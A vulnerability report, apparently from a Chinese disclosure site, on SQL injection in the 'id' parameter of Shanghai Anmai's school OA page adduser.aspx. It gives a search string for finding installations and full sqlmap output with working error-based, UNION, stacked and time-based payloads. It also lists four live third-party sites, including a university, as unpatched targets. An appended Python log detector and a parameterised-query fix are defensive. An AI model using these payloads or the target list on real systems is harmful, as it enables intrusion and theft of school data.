### Brief description:

A look around the front end.

### Details:

Affected vendor: Shanghai Anmai Computer Technology Co., Ltd. (上海安脉计算机科技有限公司)

Google/Baidu search string: 版权所有:上海安脉计算机科技有限公司 ("Copyright: Shanghai Anmai Computer Technology Co., Ltd."). A large number of schools use this system.

No vulnerability was found in the management platform itself, but the system ships with an OA (office automation) module. In `/anmai/oa/adduser.aspx` the password field is SQL-injectable, but only by hand, so it is awkward to exploit.

![1.jpg](https://images.seebug.org/upload/201409/191116461c4d6afe69e6eb2112b1e35917432117.jpg)

![2.jpg](https://images.seebug.org/upload/201409/1911165466501d749c7c4e82fc7ad2797fec7ccf.jpg)

However, the same page also serves as a user-edit form: simply append an `id` parameter, `/anmai/oa/adduser.aspx?id=1`, and `id` is injectable. Taking the vendor's own demo as an example: http://www.anmai.net/anmai/oa/adduser.aspx?id=1

sqlmap output:

```
Place: GET
Parameter: id
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=1' AND 9850=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(122)+CHAR(97)+CHAR(113)+(SELECT (CASE WHEN (9850=9850) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(110)+CHAR(114)+CHAR(103)+CHAR(113))) AND 'HCnH'='HCnH

    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: id=1' UNION ALL SELECT 67,CHAR(113)+CHAR(120)+CHAR(122)+CHAR(97)+CHAR(113)+CHAR(107)+CHAR(76)+CHAR(90)+CHAR(67)+CHAR(75)+CHAR(67)+CHAR(72)+CHAR(80)+CHAR(66)+CHAR(86)+CHAR(113)+CHAR(110)+CHAR(114)+CHAR(103)+CHAR(113),67,67,67,67,67,67--

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=1'; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=1' WAITFOR DELAY '0:0:5'--
---
[11:10:22] [INFO] testing Microsoft SQL Server
[11:10:22] [INFO] confirming Microsoft SQL Server
[11:10:26] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET, Nginx, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2005
[11:10:26] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 32 times
[11:10:26] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.anmai.net'
```

### Proof of vulnerability:

Other instances, for proof:

- http://bssyxxgl.eicbs.com/anmai/oa/addUser.aspx?id=1
- http://www.gxbyzx.cn:88/ANMAI/oa/adduser.aspx?id=1
- http://www.aqyz.net/anmai/oa/adduser.aspx?id=1
- http://ps.imau.edu.cn/anmai/oa/addUser.aspx?id=1
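For operators of this system, the sqlmap run above leaves a recognisable trail: non-numeric `id` values on `adduser.aspx` carrying the four reported techniques, plus a burst of HTTP 500s from one client. The following detector is an added example, not part of the report or the vendor's code; the combined-format log lines and client IPs are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Signatures for the techniques sqlmap reported against the id parameter
# (error-based CONVERT, UNION, stacked and time-based WAITFOR DELAY).
SIGNATURES = {
    "error-based": re.compile(r"convert\s*\(\s*int\s*,", re.I),
    "union-query": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "stacked":     re.compile(r";\s*waitfor\b", re.I),
    "time-based":  re.compile(r"\bwaitfor\s+delay\b", re.I),
}
# Combined log format (nginx/Apache): client, timestamp, request line, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')

# Constructed sample log (hypothetical client IPs) mirroring the report's payloads.
SAMPLE_LOG = """\
203.0.113.5 - - [19/Sep/2014:11:10:22 +0800] "GET /anmai/oa/adduser.aspx?id=1 HTTP/1.1" 200 5120
203.0.113.5 - - [19/Sep/2014:11:10:22 +0800] "GET /anmai/oa/adduser.aspx?id=1%27%20AND%209850%3DCONVERT(INT%2C(SELECT%20CHAR(113)))%20AND%20%27HCnH%27%3D%27HCnH HTTP/1.1" 500 1024
203.0.113.5 - - [19/Sep/2014:11:10:23 +0800] "GET /anmai/oa/adduser.aspx?id=1%27%20UNION%20ALL%20SELECT%2067%2C67%2C67%2C67%2C67%2C67%2C67%2C67-- HTTP/1.1" 200 6011
203.0.113.5 - - [19/Sep/2014:11:10:24 +0800] "GET /anmai/oa/adduser.aspx?id=1%27%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- HTTP/1.1" 200 5120
198.51.100.9 - - [19/Sep/2014:11:12:01 +0800] "GET /anmai/index.aspx HTTP/1.1" 200 3000
"""

def classify_id_param(url):
    """Return the set of technique names whose signature appears in ?id= of adduser.aspx."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith("/oa/adduser.aspx"):
        return set()
    hits = set()
    # parse_qs URL-decodes once; a plain integer is the only legitimate id.
    for value in parse_qs(parts.query, keep_blank_values=True).get("id", []):
        if value.strip().isdigit():
            continue
        hits.update(name for name, rx in SIGNATURES.items() if rx.search(value))
    return hits

def scan_log(text):
    """Return (client, status, techniques) for each suspicious adduser.aspx request."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            hits = classify_id_param(m["url"])
            if hits:
                alerts.append((m["ip"], int(m["status"]), sorted(hits)))
    return alerts

def errors_per_client(text):
    """Count HTTP 500s per client; sqlmap's run in the report produced 32 of them."""
    return dict(Counter(m["ip"] for m in map(LOG_RE.match, text.splitlines())
                        if m and m["status"] == "500"))
```

The real fix is on the server side, binding `id` as an integer parameter of a parameterised query; the log check only tells you whether the endpoint has already been probed.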